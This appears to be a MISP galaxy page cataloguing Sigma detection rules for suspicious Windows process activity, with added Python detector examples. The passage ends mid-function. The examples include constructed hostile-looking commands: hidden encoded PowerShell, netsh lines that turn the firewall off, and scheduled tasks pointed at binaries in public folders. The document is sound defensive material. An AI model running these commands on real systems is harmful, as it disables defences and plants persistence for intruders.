UUID cc4e02ba-9c06-48e2-b09e-2500cace9ae0 which can be used as unique global reference for Tasks Folder Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/01/13
falsepositive ['Unknown']
filename proc_creation_win_susp_task_folder_evasion.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.execution', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Ping/Copy Command Combination

Detects an uncommon and potentially suspicious one-liner that contains both "ping" and "copy" at the same time, a combination commonly used by malware.

Internal MISP references

UUID ded2b07a-d12f-4284-9b76-653e37b6c8b0 which can be used as unique global reference for Potentially Suspicious Ping/Copy Command Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/18
falsepositive ['Unknown']
filename proc_creation_win_cmd_ping_copy_combined_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Suspicious Modification Of Scheduled Tasks

Detects when an attacker modifies an already existing scheduled task so that it runs from a suspicious location. Attackers can create a simple-looking task in order to avoid detection at creation time, which is where most monitoring focuses, and then modify the task afterwards to include their malicious payload.
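
As an added example (not code from this page or from the Sigma project) of the check described above, the Python below looks only at "schtasks /change" invocations, extracts the new task action from /tr, and reports it when the action lives in a user-writable drop location. It goes one step beyond the description by also reporting an action that merely hands off to a script host such as powershell or mshta, since the payload then sits in the arguments rather than in a path. The directory pattern, the script-host list and the sample command lines are my assumptions.

```python
import re

TR_RE = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# World- or user-writable locations that a legitimate task action rarely lives in.
SUSPICIOUS_DIR_RE = re.compile(
    r"\\(users\\public|programdata|windows\\temp|perflogs|\$recycle\.bin|appdata\\(?:local\\temp|roaming))\\",
    re.IGNORECASE)
SCRIPT_HOSTS = {"powershell", "pwsh", "mshta", "rundll32", "regsvr32", "wscript", "cscript", "cmd", "certutil", "bitsadmin"}

# Constructed command lines; the last three are deliberate non-matches.
SAMPLE_COMMAND_LINES = [
    r'schtasks /change /tn "\Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /tr "C:\Users\Public\svchost.exe"',
    'schtasks.exe /Change /TN Backup /TR "powershell -ep bypass -w hidden -enc SQBFAFgA"',
    r'schtasks /change /tn Backup /tr "C:\Program Files\Vendor\backup.exe" /ru SYSTEM',
    r"schtasks /create /tn Updater /tr C:\Users\Public\x.exe /sc minute /mo 5",
    "schtasks /change /tn Backup /disable",
]

def is_schtasks_change(command_line):
    toks = command_line.split()
    if not toks:
        return False
    exe = toks[0].strip('"').lower().rsplit("\\", 1)[-1]
    return exe in ("schtasks", "schtasks.exe") and any(t.lower() == "/change" for t in toks)

def task_action(command_line):
    """Value of /tr (quoted or bare), or None when the command does not set the action."""
    m = TR_RE.search(command_line)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)

def suspicious_task_change(command_line):
    """Reason string when 'schtasks /change' re-points a task at a suspicious action, else None."""
    if not is_schtasks_change(command_line):
        return None
    action = task_action(command_line)
    if not action:
        return None
    dir_hit = SUSPICIOUS_DIR_RE.search(action)
    if dir_hit:
        return "action in " + dir_hit.group(0).lower()
    host = action.split()[0].strip('"').rsplit("\\", 1)[-1].lower().removesuffix(".exe")
    if host in SCRIPT_HOSTS:
        return "action runs via " + host
    return None

def scan(command_lines):
    return [(c, reason) for c in command_lines if (reason := suspicious_task_change(c))]

if __name__ == "__main__":
    for line, reason in scan(SAMPLE_COMMAND_LINES):
        print(reason, "|", line)
```

The /create and /disable samples are excluded on purpose: task creation and the disabling of existing tasks are covered by their own rules on this page, and mixing them in here would only blur what a "/change" hit means. Remember that the same modification can be made through the Register-ScheduledTask and Set-ScheduledTask cmdlets or the Task Scheduler COM API, which leave no schtasks.exe process at all; the Microsoft-Windows-TaskScheduler operational log sees those.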

Internal MISP references

UUID 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b which can be used as unique global reference for Suspicious Modification Of Scheduled Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Unknown']
filename proc_creation_win_schtasks_change.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

HackTool - PPID Spoofing SelectMyParent Tool Execution

Detects the use of parent process ID spoofing tools such as Didier Stevens' SelectMyParent.

Internal MISP references

UUID 52ff7941-8211-46f9-84f8-9903efb7077d which can be used as unique global reference for HackTool - PPID Spoofing SelectMyParent Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/23
falsepositive ['Unlikely']
filename proc_creation_win_hktl_selectmyparent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1134.004']
Related clusters

To see the related clusters, click here.

Firewall Disabled via Netsh.EXE

Detects netsh commands that turn off the Windows firewall.
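
The Python below is an added example (not code from this page or from the Sigma project) of the netsh matching the rule describes, over constructed command lines. It recognises both the current "advfirewall set <profile> state off" syntax and the deprecated "firewall set opmode disable" context, which modern Windows still accepts, and reports which profile was switched off. The regexes and samples are my assumptions.

```python
import re

NETSH_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?netsh(?:\.exe)?"?\s', re.IGNORECASE)
# Current syntax: netsh advfirewall set <profile> state off
MODERN_RE = re.compile(
    r"\badvfirewall\s+set\s+(allprofiles|currentprofile|domainprofile|privateprofile|publicprofile)\s+state\s+off\b",
    re.IGNORECASE)
# Deprecated XP/2003 syntax that is still accepted: netsh firewall set opmode [mode=]disable
LEGACY_RE = re.compile(r"\bfirewall\s+set\s+opmode\s+(?:mode\s*=\s*)?disable\b", re.IGNORECASE)

# Constructed command lines; the last three are deliberate non-matches.
SAMPLE_COMMAND_LINES = [
    "netsh advfirewall set allprofiles state off",
    "netsh.exe advfirewall set publicprofile state OFF",
    "netsh firewall set opmode disable",
    "netsh firewall set opmode mode=DISABLE exceptions=enable",
    "netsh advfirewall set allprofiles state on",
    'netsh advfirewall firewall add rule name="svc" dir=in action=allow program="C:\\Users\\Public\\svc.exe"',
    "powershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False",
]

def firewall_disabled_profile(command_line):
    """Profile that a netsh command switches off ('legacy' for the old syntax), or None."""
    if not NETSH_RE.match(command_line):
        return None
    m = MODERN_RE.search(command_line)
    if m:
        return m.group(1).lower()
    if LEGACY_RE.search(command_line):
        return "legacy"
    return None

def scan(command_lines):
    return [(c, profile) for c in command_lines if (profile := firewall_disabled_profile(c))]

if __name__ == "__main__":
    for line, profile in scan(SAMPLE_COMMAND_LINES):
        print(profile, "|", line)
```

The "\bfirewall" boundary in the legacy pattern keeps it from matching inside "advfirewall", which is why the sixth sample (adding an allow rule, a different technique) stays quiet. The seventh sample is the gap any netsh rule has: Set-NetFirewallProfile reaches the same result without netsh.exe ever starting, so pair this with PowerShell logging or with the firewall's own event channel.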

Internal MISP references

UUID 57c4bf16-227f-4394-8ec7-1b745ee061c3 which can be used as unique global reference for Firewall Disabled via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Fatih Sirin
creation_date 2019/11/01
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_fw_disable.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004', 'attack.s0108']
Related clusters

To see the related clusters, click here.

Uncommon Child Process Of BgInfo.EXE

Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

Internal MISP references

UUID aaf46cdc-934e-4284-b329-34aa701e3771 which can be used as unique global reference for Uncommon Child Process Of BgInfo.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_bginfo_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Custom Class Execution via Xwizard

Detects the execution of the Xwizard tool with specific arguments that are used to run custom class properties.

Internal MISP references

UUID 53d4bb30-3f36-4e8a-b078-69d36c4a79ff which can be used as unique global reference for Custom Class Execution via Xwizard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_creation_win_lolbin_class_exec_xwizard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Disable Important Scheduled Task

Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID 9ac94dc8-9042-493c-ba45-3b5e7c86b980 which can be used as unique global reference for Disable Important Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/26
falsepositive ['Unknown']
filename proc_creation_win_schtasks_disable.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Directory Removal Via Rmdir

Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

Internal MISP references

UUID 41ca393d-538c-408a-ac27-cf1e038be80c which can be used as unique global reference for Directory Removal Via Rmdir in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/15
falsepositive ['Unknown']
filename proc_creation_win_cmd_rmdir_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Uncommon AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.

Internal MISP references

UUID 4f2cd9b6-4a17-440f-bb2a-687abb65993a which can be used as unique global reference for Uncommon AddinUtil.EXE CommandLine Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_cmdline.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential COM Objects Download Cradles Usage - Process Creation

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

Internal MISP references

UUID 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf which can be used as unique global reference for Potential COM Objects Download Cradles Usage - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Legitimate use of the library']
filename proc_creation_win_powershell_download_com_cradles.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Add Windows Capability Via PowerShell Cmdlet

Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.

Internal MISP references

UUID b36d01a3-ddaf-4804-be18-18a6247adfcd which can be used as unique global reference for Add Windows Capability Via PowerShell Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/22
falsepositive ['Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.']
filename proc_creation_win_powershell_add_windows_capability.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Scripting/CommandLine Process Spawned Regsvr32

Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.

Internal MISP references

UUID ab37a6ec-6068-432b-a64e-2c7bf95b1d22 which can be used as unique global reference for Scripting/CommandLine Process Spawned Regsvr32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/26
falsepositive ['Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts often launch regsvr32 legitimately. Apply additional filters and exclusions as necessary', 'Some legitimate Windows services']
filename proc_creation_win_regsvr32_susp_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

DLL Execution Via Register-cimprovider.exe

Detects using register-cimprovider.exe to execute arbitrary dll file.

Internal MISP references

UUID a2910908-e86f-4687-aeba-76a5f996e652 which can be used as unique global reference for DLL Execution Via Register-cimprovider.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ivan Dyachkov, Yulia Fomina, oscd.community
creation_date 2020/10/07
falsepositive ['Unknown']
filename proc_creation_win_registry_cimprovider_dll_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574']
Related clusters

To see the related clusters, click here.

Uncommon Userinit Child Process

Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.

Internal MISP references

UUID 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 which can be used as unique global reference for Uncommon Userinit Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure), Tim Shelton
creation_date 2019/01/12
falsepositive ['Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly.']
filename proc_creation_win_userinit_uncommon_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1037.001', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Start of NT Virtual DOS Machine

Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications

Internal MISP references

UUID 16905e21-66ee-42fe-b256-1318ada2d770 which can be used as unique global reference for Start of NT Virtual DOS Machine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/16
falsepositive ['Legitimate use']
filename proc_creation_win_susp_16bit_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

SystemStateBackup Deleted Using Wbadmin.EXE

Detects deletion of the Windows system state backup using wbadmin.exe. This technique is used by numerous ransomware families. It may only succeed on server platforms that have Windows Backup enabled.

Internal MISP references

UUID 89f75308-5b1b-4390-b2d8-d6b2340efaf8 which can be used as unique global reference for SystemStateBackup Deleted Using Wbadmin.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Unknown']
filename proc_creation_win_wbadmin_delete_systemstatebackup.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

File Download Using ProtocolHandler.exe

Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

Internal MISP references

UUID 104cdb48-a7a8-4ca7-a453-32942c6e5dcb which can be used as unique global reference for File Download Using ProtocolHandler.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename proc_creation_win_protocolhandler_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Uncommon One Time Only Scheduled Task At 00:00

Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
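
As an added illustration of the logic this rule describes (example code written for this page, not the Sigma rule's own detection logic or MISP project code), the following Python parses schtasks command lines from constructed process-creation events and flags a task created to run once at 00:00 whose action looks suspicious. The suspicious-action markers and the set of value-taking schtasks switches are assumptions made for the example, not the rule's exact lists.

```python
import re

# Constructed process-creation events for illustration (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Updater" /sc once /st 00:00 /tr "powershell -w hidden -enc SQBFAFgA"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /Create /SC ONCE /ST 00:00 /TN Cleanup /TR "rundll32.exe C:\Users\Public\x.dll,Start"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Backup" /sc daily /st 00:00 /tr "C:\Program Files\Backup\backup.exe"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "Installer" /sc once /st 00:00 /tr "C:\Program Files\Vendor\setup.exe /quiet"'},
]

# Illustrative markers of a suspicious task action (assumed list, not the rule's exact one).
SUSPICIOUS_ACTION_MARKERS = (
    "powershell", "rundll32", "regsvr32", "mshta", "wscript", "cscript",
    "\\users\\public\\", "\\temp\\", "\\appdata\\", "-enc", "http",
)

# schtasks switches that take their value from the following token (assumed subset).
VALUE_OPTIONS = {"sc", "st", "tr", "tn", "ru", "rp", "mo", "d", "m", "sd", "ed",
                 "du", "ri", "xml", "s", "u", "p"}


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def parse_schtasks(cmdline):
    """Return schtasks switches as a dict: flag switches map to True, value switches to their value."""
    tokens = tokenize(cmdline)
    opts = {}
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            if name in VALUE_OPTIONS and i + 1 < len(tokens):
                opts[name] = tokens[i + 1].strip('"')
                i += 2
                continue
            opts[name] = True
        i += 1
    return opts


def is_one_shot_at_midnight(opts):
    return (opts.get("create") is True
            and str(opts.get("sc", "")).lower() == "once"
            and opts.get("st") == "00:00")


def has_suspicious_action(action):
    action = action.lower()
    return any(marker in action for marker in SUSPICIOUS_ACTION_MARKERS)


def evaluate(event):
    """True when schtasks creates a run-once task at 00:00 with a suspicious /tr action."""
    if not event["Image"].lower().endswith("\\schtasks.exe"):
        return False
    opts = parse_schtasks(event["CommandLine"])
    return is_one_shot_at_midnight(opts) and has_suspicious_action(str(opts.get("tr", "")))


def triage(events):
    return [e["CommandLine"] for e in events if evaluate(e)]


if __name__ == "__main__":
    for line in triage(EVENTS):
        print("ALERT:", line)
```

The third and fourth constructed events show the two ways a benign installer escapes the rule: a daily schedule, or a run-once task whose action points at a vendor path. Tasks registered through the Task Scheduler COM API or the Register-ScheduledTask cmdlet never spawn schtasks.exe, so a process-creation rule will not see them; pair it with task-creation auditing (Security event 4698) or the Task Scheduler operational log.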

Internal MISP references

UUID 970823b7-273b-460a-8afc-3a6811998529 which can be used as unique global reference for Uncommon One Time Only Scheduled Task At 00:00 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/07/15
falsepositive ['Software installation']
filename proc_creation_win_schtasks_one_time_only_midnight_task.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Copying Sensitive Files with Credential Data

Detects the copying of well-known sensitive files that contain credential data

Internal MISP references

UUID e7be6119-fc37-43f0-ad4f-1f3f99be2f9f which can be used as unique global reference for Copying Sensitive Files with Credential Data in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/22
falsepositive ['Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator']
filename proc_creation_win_esentutl_sensitive_file_copy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.003', 'car.2013-07-001', 'attack.s0404']
Related clusters

To see the related clusters, click here.

Suspicious Driver Install by pnputil.exe

Detects a possibly suspicious driver being installed via the pnputil.exe LOLBin

Internal MISP references

UUID a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 which can be used as unique global reference for Suspicious Driver Install by pnputil.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
creation_date 2021/09/30
falsepositive ['Pnputil.exe being used may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

Use of UltraVNC Remote Access Software

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks

Internal MISP references

UUID 145322e4-0fd3-486b-81ca-9addc75736d8 which can be used as unique global reference for Use of UltraVNC Remote Access Software in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/02
falsepositive ['Legitimate use']
filename proc_creation_win_ultravnc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Indirect Inline Command Execution Via Bash.EXE

Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Internal MISP references

UUID 5edc2273-c26f-406c-83f3-f4d948e740dd which can be used as unique global reference for Indirect Inline Command Execution Via Bash.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/24
falsepositive ['Unknown']
filename proc_creation_win_bash_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Operator Bloopers Cobalt Strike Modules

Detects Cobalt Strike module/commands accidentally entered in CMD shell

Internal MISP references

UUID 4f154fb6-27d1-4813-a759-78b93e0b9c48 which can be used as unique global reference for Operator Bloopers Cobalt Strike Modules in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022/05/06
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']
Related clusters

To see the related clusters, click here.

Service Started/Stopped Via Wmic.EXE

Detects usage of wmic to start or stop a service

Internal MISP references

UUID 0b7163dc-7eee-4960-af17-c0cd517f92da which can be used as unique global reference for Service Started/Stopped Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_wmic_service_manipulation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Odbcconf.EXE Suspicious DLL Location

Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.

Internal MISP references

UUID 6b65c28e-11f3-46cb-902a-68f2cafaf474 which can be used as unique global reference for Odbcconf.EXE Suspicious DLL Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/22
falsepositive ['Unlikely']
filename proc_creation_win_odbcconf_exec_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Windows App Activity

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

Internal MISP references

UUID f91ed517-a6ba-471d-9910-b3b4a398c0f3 which can be used as unique global reference for Potentially Suspicious Windows App Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/12
falsepositive ['Legitimate packages that make use of external binaries such as Windows Terminal']
filename proc_creation_win_susp_appx_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Mshtml.DLL RunHTMLApplication Suspicious Usage

Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)

Internal MISP references

UUID 4782eb5a-a513-4523-a0ac-f3082b26ac5c which can be used as unique global reference for Mshtml.DLL RunHTMLApplication Suspicious Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
creation_date 2022/08/14
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_mshtml_runhtmlapplication.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution']

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

Internal MISP references

UUID 0900463c-b33b-49a8-be1d-552a3b553dae which can be used as unique global reference for Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
creation_date 2023/10/09
falsepositive ['Unlikely']
filename proc_creation_win_susp_hidden_dir_index_allocation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Visual Basic Command Line Compiler Usage

Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.

Internal MISP references

UUID 7b10f171-7f04-47c7-9fa2-5be43c76e535 which can be used as unique global reference for Visual Basic Command Line Compiler Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ensar Şamil, @sblmsrsn, @oscd_initiative
creation_date 2020/10/07
falsepositive ['Utilization of this tool should not be seen in enterprise environment']
filename proc_creation_win_lolbin_visual_basic_compiler.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

Potential DLL File Download Via PowerShell Invoke-WebRequest

Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet

Internal MISP references

UUID 0f0450f3-8b47-441e-a31b-15a91dc243e2 which can be used as unique global reference for Potential DLL File Download Via PowerShell Invoke-WebRequest in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Hieu Tran
creation_date 2023/03/13
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.execution', 'attack.t1059.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

File Deletion Via Del

Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

Internal MISP references

UUID 379fa130-190e-4c3f-b7bc-6c8e834485f3 which can be used as unique global reference for File Deletion Via Del in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/15
falsepositive ['False positive levels will differ depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity']
filename proc_creation_win_cmd_del_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.004']
Related clusters

To see the related clusters, click here.

Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE

Detects usage of "findstr" with the argument "385201", which could indicate discovery of an installed Sysinternals Sysmon service via its default driver altitude (even if the service name has been changed).
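
To show why the altitude gives Sysmon away and what the rule actually keys on, here is an added Python example (written for this page, not the Sigma rule's or Sysmon's own code). It parses constructed "fltmc filters" output in which the Sysmon driver has been renamed, finds the filter sitting at altitude 385201 regardless of its name, and then runs the findstr-based detection over constructed process-creation events. The fltmc table and the events are constructed samples.

```python
SYSMON_DEFAULT_ALTITUDE = "385201"

# Constructed 'fltmc filters' output (illustrative, not captured from a real host).
# The Sysmon driver was renamed at install time but kept its default altitude.
FLTMC_OUTPUT = """\
Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
AcmeTelemetry                           4       385201         0
WdFilter                                4       328010         0
storqosflt                              0       244000         0
wcifs                                   0       189900         0
"""


def parse_fltmc(text):
    """Parse the tabular output of 'fltmc filters' into a list of dicts."""
    filters = []
    for line in text.splitlines():
        parts = line.split()
        # header and separator lines have no numeric altitude column
        if len(parts) < 4 or not parts[-2].isdigit():
            continue
        filters.append({"name": parts[0], "instances": int(parts[-3]),
                        "altitude": parts[-2], "frame": int(parts[-1])})
    return filters


def filters_at_sysmon_altitude(filters):
    """Names of loaded minifilters at Sysmon's default altitude, whatever they are called."""
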